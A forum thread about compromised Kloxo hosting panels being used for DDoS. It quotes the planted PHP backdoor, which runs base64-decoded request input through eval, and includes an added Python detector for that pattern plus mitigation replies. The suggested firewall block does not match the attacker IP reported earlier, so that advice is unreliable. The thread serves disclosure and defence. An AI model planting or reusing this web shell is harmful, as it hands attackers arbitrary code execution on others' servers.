Kloxo installations compromised

Discussion in 'Masalah Teknik dan Keamanan' started by FluidaWeb, 29 Jan 2014.

Thread Status:
Not open for further replies.
  1. FluidaWeb

    FluidaWeb Expert 1.0

    Info for Kloxo users and VPS providers: many Kloxo installations have been compromised and are being used for DDoS. I've read that many VPS providers are carrying out mass suspensions because of this. So VPS providers, please check; your servers may be quietly carrying out DDoS.
    I don't know whether this also affects Kloxo MR.

    Here is the info from an outside forum where this is currently a hot topic:

    We had been considering dropping the Kloxo "Host In A Box" template anyway, since it hasn't been updated for 2+ years, but now the final nail has been driven into the coffin.

    Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into ./home/kloxo/httpd/default/, which is the 'default' site accessible by IP address.

    UPDATE: default.php in the same directory will also be compromised. See source here: http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=

    This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E= ):
    Code:
    <?php
    set_time_limit(0);error_reporting(NULL);
    if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
    else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\">Access denied.';}
    ?>
    Where the $_REQUEST variable is a random value. The basic premise of the script is: if the specific $_REQUEST variable is set, then decode and run all of the code passed via variable. This is obviously bad.

    All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)

    Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We've had 4 instances this morning, and it's affected Ramnode, if not others. Beware!
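A detection sketch for the indicator described in the post above, added here as an example and not part of the thread or of Kloxo: it flags PHP files in a docroot that match the `eval(base64_decode($_REQUEST[...]))` pattern, then counts which client IPs requested those files in an access log. The function names, the sample file name `xk3v9q.php`, the key `k1`, the log lines and the IP addresses are constructed for illustration, and a common/combined access-log format is assumed.

```python
import re
import sys
import tempfile
from collections import Counter
from pathlib import Path

# eval(base64_decode($_REQUEST['<key>'])), whitespace-tolerant, any request superglobal.
BACKDOOR_RE = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)"
    rb"\s*\[\s*['\"]([^'\"]+)['\"]\s*\]", re.IGNORECASE)
# Client IP and request path from a common/combined-format access log line (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+)')

def find_backdoors(docroot):
    """Return {file name: request key} for PHP files that match BACKDOOR_RE."""
    hits = {}
    for path in sorted(Path(docroot).glob("*.php")):
        match = BACKDOOR_RE.search(path.read_bytes())
        if match:
            hits[path.name] = match.group(1).decode("ascii", "replace")
    return hits

def callers(log_lines, file_names):
    """Count requests per client IP whose path ends in a flagged file name."""
    counts = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group(2).split("?", 1)[0].rsplit("/", 1)[-1] in file_names:
            counts[m.group(1)] += 1
    return counts

def demo():
    """Run both steps on constructed samples (inert text, documentation-range IPs)."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "xk3v9q.php").write_text(
            "<?php if(($_REQUEST['k1'])!=NULL){eval( base64_decode($_REQUEST['k1']));} ?>")
        Path(root, "index.php").write_text("<?php echo 'hello'; ?>")
        hits = find_backdoors(root)
    log = ['198.51.100.7 - - [29/Jan/2014:10:00:00 +0000] "POST /xk3v9q.php HTTP/1.1" 200 5',
           '203.0.113.9 - - [29/Jan/2014:10:00:01 +0000] "GET /index.php?a=1 HTTP/1.1" 200 9',
           '198.51.100.7 - - [29/Jan/2014:10:00:02 +0000] "GET /xk3v9q.php?k1=eA== HTTP/1.1" 200 5']
    return hits, callers(log, set(hits))

if __name__ == "__main__":
    # With arguments: docroot [access_log]; without: the constructed demo.
    if len(sys.argv) > 1:
        found = find_backdoors(sys.argv[1])
        lines = Path(sys.argv[2]).read_text(errors="replace").splitlines() if len(sys.argv) > 2 else []
        print(found, dict(callers(lines, set(found))))
    else:
        print(demo())
```

Pointed at `/home/kloxo/httpd/default` it also covers `default.php`, since every `*.php` file in the directory is checked. The regex only matches this plain form of the code, so a clean result does not rule out an obfuscated variant.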
     
  2. voezie

    voezie Hosting Guru

    Temporary solution for Kloxo users:

    1. Disable login access to Kloxo and disable Kloxo auto-update
    2. Disable access from / block the IP range 178.248.23.0/24 in the firewall / iptables
     
  3. mustafaramadhan

    mustafaramadhan Hosting Guru

    Remember, this is happening on official Kloxo, even on the latest version (6.1.12), whereas Kloxo-MR (6.5.0/6.5.1) has already patched this issue.
     
  4. mustafaramadhan

    mustafaramadhan Hosting Guru

    Many providers have already confirmed that official Kloxo users can update to Kloxo-MR. They report 'Kloxo-MR is fine'.
     
  5. ainuloke

    ainuloke Beginner 2.0

    Yes, I've disabled mine...
     
  6. Konx

    Konx Beginner 1.0

    When upgrading from official Kloxo to Kloxo-MR, do the web files and MySQL need to be backed up, or is that not necessary?
     
  7. mustafaramadhan

    mustafaramadhan Hosting Guru

    Always back up. Kloxo-MR is indeed designed not to 'damage' your data, even if you reinstall Kloxo-MR.
     
  8. xphones

    xphones Expert 1.0

    After so long seeming barely alive, official Kloxo has finally released version 6.1.13, intended to close this security issue. Its driving force = Danny

    Meanwhile KloxoMR is also still being updated diligently to this day. Its driving force = Mustafaramadhan.

    Please choose which one you want to use..?? :D
     
  9. FluidaWeb

    FluidaWeb Expert 1.0

    This will be hard work for the developers of both Kloxo and Kloxo MR, because it seems impossible to close all of the many bugs in just a week, a month or two months.
     
  10. syarwin

    syarwin Poster 2.0

    Respect. The important thing is to keep your spirits up. No system is perfect, but if it is updated diligently, Kloxo-MR will become known and widely used.
     